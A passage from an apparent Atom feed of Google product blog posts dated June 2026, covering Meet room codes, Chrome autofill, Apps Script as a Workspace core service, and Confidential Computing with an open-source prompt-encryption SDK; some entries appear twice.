    <content type="html">&lt;div&gt;Google Meet users can now connect to nearby conference room hardware by entering a 5-character room code on their personal device. Meet recently launched &lt;a href="https://workspaceupdates.googleblog.com/2026/04/seamlessly-join-meetings-on-google-meet-hardware-with-Connect-Room.html" target="_blank"&gt;Connect Room&lt;/a&gt; using proximity-based detection to identify nearby hardware. This update provides a reliable manual fallback when ultrasound is unavailable or disabled. Users will see a "Connect with room code" button on their device’s pre-call screen, which allows them to enter the alphanumeric code displayed directly on the hardware’s screen.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiXcJn715qdLaXM7JQeqs_yZpd-17G-7NuJBzdUBzyB7By2990R6z3JJ6q9mYYo5etMKsYeb0fKvEDZlYGy6Ljk-lhdwWIxsRDMmIUBUo5Qw1YBmoSRyxSNFuzmKupn7wsDt4W4qJT1kz-LnrUDB68p0cIBa3FTW2Nwfg6KeO3i0cesEe9_3C7_kPYhRA/s1141/Connect%20to%20Google%20Meet%20hardware%20with%20room%20codes%20-%206985.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiXcJn715qdLaXM7JQeqs_yZpd-17G-7NuJBzdUBzyB7By2990R6z3JJ6q9mYYo5etMKsYeb0fKvEDZlYGy6Ljk-lhdwWIxsRDMmIUBUo5Qw1YBmoSRyxSNFuzmKupn7wsDt4W4qJT1kz-LnrUDB68p0cIBa3FTW2Nwfg6KeO3i0cesEe9_3C7_kPYhRA/s16000/Connect%20to%20Google%20Meet%20hardware%20with%20room%20codes%20-%206985.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;This feature ensures that meetings remain accessible particularly for private or ad-hoc sessions where automated detection might fail. To maintain security and prevent accidental connections, users must physically confirm their presence by tapping the room hardware screen after entering the code. The room code itself is designed for clarity and security, refreshing every few minutes to ensure only those in the room can initiate the connection.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;For IT administrators, this update reduces troubleshooting overhead by providing a built-in alternative for rooms with complex acoustic environments or restricted proximity settings. By streamlining the connection process, organizations can ensure that employees spend less time managing hardware and more time collaborating effectively.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Note: &lt;/b&gt;This feature is only available to users in domains on the Rapid Release track attempting to connect to devices enrolled in &lt;a href="https://knowledge.workspace.google.com/admin/meet-hardware/try-features-early-on-your-devices?visit_id=639160597773593743-1868804841&amp;amp;rd=1" target="_blank"&gt;Early Preview&lt;/a&gt;. We’ll provide an update on the Workspace Updates blog when we begin a broader rollout.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;To preview this feature, your domain must be on the &lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release track&lt;/a&gt; and have devices enrolled in Early Preview. Visit the Help Center to &lt;a href="https://knowledge.workspace.google.com/admin/meet-hardware/try-features-early-on-your-devices?visit_id=639160597773593743-1868804841&amp;amp;rd=1" target="_blank"&gt;learn more about enabling Early Preview for your Meet hardware devices&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users:&amp;nbsp;&lt;/b&gt;Visit the Help Center to &lt;a href="https://support.google.com/meet/answer/16765739?hl=en" target="_blank"&gt;learn more about connecting with room codes&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release domains&lt;/a&gt;:&amp;nbsp;Rolling out now to Meet hardware devices enrolled in &lt;a href="https://knowledge.workspace.google.com/admin/meet-hardware/try-features-early-on-your-devices?visit_id=639160597773593743-1868804841&amp;amp;rd=1" target="_blank"&gt;Early Preview&lt;/a&gt;, with expected completion by June 30, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers with Google Meet hardware devices&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Meet Help: &lt;a href="https://support.google.com/meet/answer/16765739" target="_blank"&gt;Use Connect room feature in Google Meet&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Workspace Updates Blog: &lt;a href="https://workspaceupdates.googleblog.com/2026/04/seamlessly-join-meetings-on-google-meet-hardware-with-Connect-Room.html" target="_blank"&gt;Seamlessly join meetings on Google Meet hardware with “Connect room”&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/room-codes-google-meet-hardware-early-preview.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-23T18:57:59+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/room-codes-google-meet-hardware-early-preview.html</id>
    <title>Connect to Google Meet hardware with room codes now in Early Preview</title>
    <updated>2026-06-23T18:57:59+00:00</updated>
    <content type="html">&lt;div&gt;Google Meet users can now connect to nearby conference room hardware by entering a 5-character room code on their personal device. Meet recently launched &lt;a href="https://workspaceupdates.googleblog.com/2026/04/seamlessly-join-meetings-on-google-meet-hardware-with-Connect-Room.html" target="_blank"&gt;Connect Room&lt;/a&gt; using proximity-based detection to identify nearby hardware. This update provides a reliable manual fallback when ultrasound is unavailable or disabled. Users will see a "Connect with room code" button on their device’s pre-call screen, which allows them to enter the alphanumeric code displayed directly on the hardware’s screen.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiXcJn715qdLaXM7JQeqs_yZpd-17G-7NuJBzdUBzyB7By2990R6z3JJ6q9mYYo5etMKsYeb0fKvEDZlYGy6Ljk-lhdwWIxsRDMmIUBUo5Qw1YBmoSRyxSNFuzmKupn7wsDt4W4qJT1kz-LnrUDB68p0cIBa3FTW2Nwfg6KeO3i0cesEe9_3C7_kPYhRA/s1141/Connect%20to%20Google%20Meet%20hardware%20with%20room%20codes%20-%206985.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiXcJn715qdLaXM7JQeqs_yZpd-17G-7NuJBzdUBzyB7By2990R6z3JJ6q9mYYo5etMKsYeb0fKvEDZlYGy6Ljk-lhdwWIxsRDMmIUBUo5Qw1YBmoSRyxSNFuzmKupn7wsDt4W4qJT1kz-LnrUDB68p0cIBa3FTW2Nwfg6KeO3i0cesEe9_3C7_kPYhRA/s16000/Connect%20to%20Google%20Meet%20hardware%20with%20room%20codes%20-%206985.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;This feature ensures that meetings remain accessible particularly for private or ad-hoc sessions where automated detection might fail. To maintain security and prevent accidental connections, users must physically confirm their presence by tapping the room hardware screen after entering the code. The room code itself is designed for clarity and security, refreshing every few minutes to ensure only those in the room can initiate the connection.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;For IT administrators, this update reduces troubleshooting overhead by providing a built-in alternative for rooms with complex acoustic environments or restricted proximity settings. By streamlining the connection process, organizations can ensure that employees spend less time managing hardware and more time collaborating effectively.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Note: &lt;/b&gt;This feature is only available to users in domains on the Rapid Release track attempting to connect to devices enrolled in &lt;a href="https://knowledge.workspace.google.com/admin/meet-hardware/try-features-early-on-your-devices?visit_id=639160597773593743-1868804841&amp;amp;rd=1" target="_blank"&gt;Early Preview&lt;/a&gt;. We’ll provide an update on the Workspace Updates blog when we begin a broader rollout.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;Admins: To preview this feature, your domain must be on the &lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release track&lt;/a&gt; and have devices enrolled in Early Preview. Visit the Help Center to &lt;a href="https://knowledge.workspace.google.com/admin/meet-hardware/try-features-early-on-your-devices?visit_id=639160597773593743-1868804841&amp;amp;rd=1" target="_blank"&gt;learn more about enabling Early Preview for your Meet hardware devices&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users:&amp;nbsp;&lt;/b&gt;Visit the Help Center to &lt;a href="https://support.google.com/meet/answer/16765739?hl=en" target="_blank"&gt;learn more about connecting with room codes&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release domains&lt;/a&gt;:&amp;nbsp;Rolling out now to Meet hardware devices enrolled in &lt;a href="https://knowledge.workspace.google.com/admin/meet-hardware/try-features-early-on-your-devices?visit_id=639160597773593743-1868804841&amp;amp;rd=1" target="_blank"&gt;Early Preview&lt;/a&gt;, with expected completion by June 30, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers with Google Meet hardware devices&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Meet Help: &lt;a href="https://support.google.com/meet/answer/16765739" target="_blank"&gt;Use Connect room feature in Google Meet&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Workspace Updates Blog: &lt;a href="https://workspaceupdates.googleblog.com/2026/04/seamlessly-join-meetings-on-google-meet-hardware-with-Connect-Room.html" target="_blank"&gt;Seamlessly join meetings on Google Meet hardware with “Connect room”&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/room-codes-google-meet-hardware-early-preview.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-23T18:57:59+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/chrome/autofill-ios-android-wallet</id>
    <title>Chrome is bringing advanced autofill capabilities to your phone with Google Wallet</title>
    <updated>2026-06-23T17:00:00+00:00</updated>
    <content type="html">Image of various forms using autofill</content>
    <link href="https://blog.google/products-and-platforms/products/chrome/autofill-ios-android-wallet" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-23T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/chrome/autofill-ios-android-wallet/</id>
    <title>Chrome is bringing advanced autofill capabilities to your phone with Google Wallet</title>
    <updated>2026-06-23T17:00:00+00:00</updated>
    <content type="html">Image of various forms using autofill</content>
    <link href="https://blog.google/products-and-platforms/products/chrome/autofill-ios-android-wallet/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-23T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/google-apps-script-workspace-core-service.html</id>
    <title>Google Apps Script is now a Google Workspace core service with enterprise-grade data protection</title>
    <updated>2026-06-23T16:31:06+00:00</updated>
    <content type="html">Google Apps Script is officially a Google Workspace core service. Covered under the &lt;a href="https://workspace.google.com/terms/premier_terms/" target="_blank"&gt;Google Cloud Terms of Service&lt;/a&gt; and &lt;a href="https://workspace.google.com/terms/education_terms/" target="_blank"&gt;Google Workspace for Education Terms of Service&lt;/a&gt;, Apps Script now offers the same enterprise-grade data protection, robust administrative controls, and standard technical support that safeguards other core services.  With this update, you can now more confidently deploy Apps Script across your organization.&lt;h4 style="text-align: left;"&gt;&lt;b&gt;More about Apps Script&lt;/b&gt;&lt;/h4&gt;&lt;div&gt;Apps Script is a cloud-based JavaScript platform that enables users to customize, automate, and extend Google Workspace applications like Sheets, Docs, and Forms, as well as build custom solutions and add-ons. You can use it to:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Create custom menus, dialogs, and sidebars within Sheets, Docs, and Slides.&lt;/li&gt;&lt;li&gt;Write custom functions for Sheets to automate complex calculations.&lt;/li&gt;&lt;li&gt;Build internal add-ons to streamline organizational workflows and integrate with third-party APIs.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;If you already have Apps Script enabled:&lt;/b&gt; No action is required. Your organization will automatically benefit from these new core service protections and technical support.&lt;/li&gt;&lt;li&gt;&lt;b&gt;If you previously restricted Apps Script: &lt;/b&gt;If you turned Apps Script off due to compliance, security, or support concerns, you can now enable the service to provide secure, custom automation for your users. Visit the Help Center to &lt;a href="https://knowledge.workspace.google.com/admin/users/access/turn-apps-script-on-or-off-for-users" target="_blank"&gt;learn how to manage Apps Script access for your organization&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;No action is required. Visit the Help Center to &lt;a href="https://developers.google.com/apps-script" target="_blank"&gt;learn more about getting started with Apps Script&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Available now&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Apps Script is now available as a core service for all Google Workspace customers&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Developer Documentation: &lt;a href="https://developers.google.com/apps-script" target="_blank"&gt;Apps Script&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/users/access/turn-apps-script-on-or-off-for-users" target="_blank"&gt;Turn Apps Script on or off for users&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/google-apps-script-workspace-core-service.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-23T16:31:06+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/google-apps-script-workspace-core-service.html</id>
    <title>Google Apps Script is now a Google Workspace core service with enterprise-grade data protection</title>
    <updated>2026-06-23T16:31:06+00:00</updated>
    <content type="html">Google Apps Script is officially a Google Workspace core service. Covered under the &lt;a href="https://workspace.google.com/terms/premier_terms/" target="_blank"&gt;Google Cloud Terms of Service&lt;/a&gt; and &lt;a href="https://workspace.google.com/terms/education_terms/" target="_blank"&gt;Google Workspace for Education Terms of Service&lt;/a&gt;, Apps Script now offers the same enterprise-grade data protection, robust administrative controls, and standard technical support that safeguards other core services.  With this update, you can now more confidently deploy Apps Script across your organization.&lt;h4 style="text-align: left;"&gt;&lt;b&gt;More about Apps Script&lt;/b&gt;&lt;/h4&gt;&lt;div&gt;Apps Script is a cloud-based JavaScript platform that enables users to customize, automate, and extend Google Workspace applications like Sheets, Docs, and Forms, as well as build custom solutions and add-ons. You can use it to:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Create custom menus, dialogs, and sidebars within Sheets, Docs, and Slides.&lt;/li&gt;&lt;li&gt;Write custom functions for Sheets to automate complex calculations.&lt;/li&gt;&lt;li&gt;Build internal add-ons to streamline organizational workflows and integrate with third-party APIs.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;If you already have Apps Script enabled:&lt;/b&gt; No action is required. Your organization will automatically benefit from these new core service protections and technical support.&lt;/li&gt;&lt;li&gt;&lt;b&gt;If you previously restricted Apps Script: &lt;/b&gt;If you turned Apps Script off due to compliance, security, or support concerns, you can now enable the service to provide secure, custom automation for your users. Visit the Help Center to &lt;a href="https://knowledge.workspace.google.com/admin/users/access/turn-apps-script-on-or-off-for-users" target="_blank"&gt;learn how to manage Apps Script access for your organization&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;No action is required. Visit the Help Center to &lt;a href="https://developers.google.com/apps-script" target="_blank"&gt;learn more about getting started with Apps Script&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Available now&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Apps Script is now available as a core service for all Google Workspace customers&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Developer Documentation: &lt;a href="https://developers.google.com/apps-script" target="_blank"&gt;Apps Script&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/users/access/turn-apps-script-on-or-off-for-users" target="_blank"&gt;Turn Apps Script on or off for users&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/google-apps-script-workspace-core-service.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-23T16:31:06+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/identity-security/verifiable-trust-in-the-ai-era-whats-new-in-confidential-computing</id>
    <title>Verifiable, private AI: Google Cloud expands Confidential Computing frontiers</title>
    <updated>2026-06-23T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Protecting sensitive data used with AI is a critical part of our commitment to providing advanced and secure cloud infrastructure. Confidential Computing cryptographically protects data in use in hardware-based Trusted Execution Environments (TEEs) with verifiable data integrity. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are thrilled to share our latest &lt;/span&gt;&lt;a href="https://cloud.google.com/security/products/confidential-computing"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Confidential Computing&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; innovations across our hardware ecosystem that help further strengthen verifiable privacy in cloud AI deployments. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Confidential AI at global scale&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By scaling our Confidential AI capabilities globally, we help ensure that AI inference and fine-tuning workloads can run with enforceable privacy guarantees. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Democratizing Confidential AI: Confidential G4 VMs with NVIDIA RTX PRO 6000 Blackwell GPUs in preview&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are excited to announce a landmark moment for accessible Confidential AI at global scale:  &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/confidential-computing/confidential-vm/docs/create-a-confidential-vm-instance-with-gpu"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Confidential VMs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/gpus-confidential-nodes"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Confidential GKE&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; Nodes on the accelerator-optimized &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/compute/docs/accelerator-optimized-machines#g4-series"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;G4 machine series&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, featuring &lt;/span&gt;&lt;a href="https://www.nvidia.com/en-us/products/workstations/professional-desktop-gpus/rtx-pro-6000-family/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;NVIDIA &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;RTX PRO 6000 &lt;/span&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Blackwell Server Edition GPUs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;What makes this a game-changer is its global scale and flexibility. Confidential G4 is available in every &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/compute/docs/regions-zones/gpu-regions-zones#view-using-table"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud region&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; that the standard G4 is available, across multiple &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/compute/docs/accelerator-optimized-machines#consumption_option_availability_by_machine_type"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;consumption models&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; including On Demand, Reservations, DWS Flex Start, and Spot/Preemptible. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;"As organizations scale AI across multiple infrastructure environments, maintaining privacy and control over data and execution becomes increasingly challenging. Google Cloud Confidential G4 VMs powered by NVIDIA RTX PRO 6000 Blackwell GPUs are a meaningful addition to the expanding Confidential AI infrastructure ecosystem. As AI workflows now span agents, data sources, and infrastructure boundaries, Super Protocol provides a consistent Confidential AI operating model across Google Cloud Confidential VMs, other clouds, and on-premises environments — abstracting away confidential computing complexity and allowing teams to focus on AI outcomes," said Yulia Gontar, COO, Super Protocol.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Powered by 5th Generation AMD EPYC Turin CPUs leveraging AMD SEV, the G4 machine series with NVIDIA RTX PRO 6000 Blackwell GPUs activates robust hardware-based security. This architecture helps ensure that sensitive data is protected during processing inside the TEE, while also encrypting data as it travels between the CPU and GPU.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;"GCP's Confidential G4 VM was the obvious choice for Vertebrae because privacy and security are non-negotiable for our customers. Our product processes sensitive work discussions, so we need to support hardware-signed attestation that both CPU and GPU are running in a trusted execution environment. Using confidential computing on Google Cloud lets us deliver the frontier of AI privacy in the cloud," said Andy Qin, CEO, &lt;/span&gt;&lt;a href="http://vertebrae.ai/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Vertebrae&lt;/span&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With Confidential G4, you can unlock AI inference, fine-tuning, HPC, and use cases involving highly restricted data, sensitive models, or private prompts, all with minimal performance impact. Get started with &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/confidential-computing/confidential-vm/docs/create-a-confidential-vm-instance-with-gpu"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Confidential G4 VMs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/gpus-confidential-nodes"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Confidential G4 GKE Nodes&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Enabling end-to-end private inference: Open-source Prompt Encryption SDKs&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Even as we make Confidential AI accessible, we understand that protecting sensitive data in AI workloads goes beyond securing the model execution environment. The prompts and responses themselves can contain highly-confidential information. To provide cryptographic protection for the entire inference lifecycle, we are happy to announce the open-source launch of our Prompt Encryption SDKs, now available on &lt;/span&gt;&lt;a href="https://github.com/google/prompt-encryption-sdk" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GitHub&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This toolkit helps you establish an end-to-end secure channel for your AI inference workloads, ensuring that prompts are cryptographically protected from the moment they leave the client until they are processed in the TEE; model responses are similarly protected all the way back to the client.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/promt_encryption_diagram.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Prompt and response encryption using Prompt Encryption SDK.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The Client SDK is integrated into the client application and works in tandem with the Server SDK integrated into the inference server running in the TEE. Once the SDKs have been used to establish an attested TLS session, the client can be confident that the server is running an authorized workload within a verified Confidential Computing environment. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The client app can then send encrypted prompts to the inference server, knowing that only this server will be able to decrypt and process it in the TEE. Once the server has a response ready, it sends it back via the same encrypted channel to the client app.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can get started today with the &lt;/span&gt;&lt;a href="https://github.com/google/prompt-encryption-sdk" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GitHub repository&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and the &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/prompt-encryption-sdk#0" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Codelab&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Enabling Apple Private Cloud Compute on Google Cloud&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our commitment to privacy is deeply exemplified by our &lt;/span&gt;&lt;a href="https://security.apple.com/blog/expanding-pcc/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;collaboration with Apple&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to expand Private Cloud Compute (PCC) on Google Cloud. &lt;/span&gt;&lt;/p&gt;
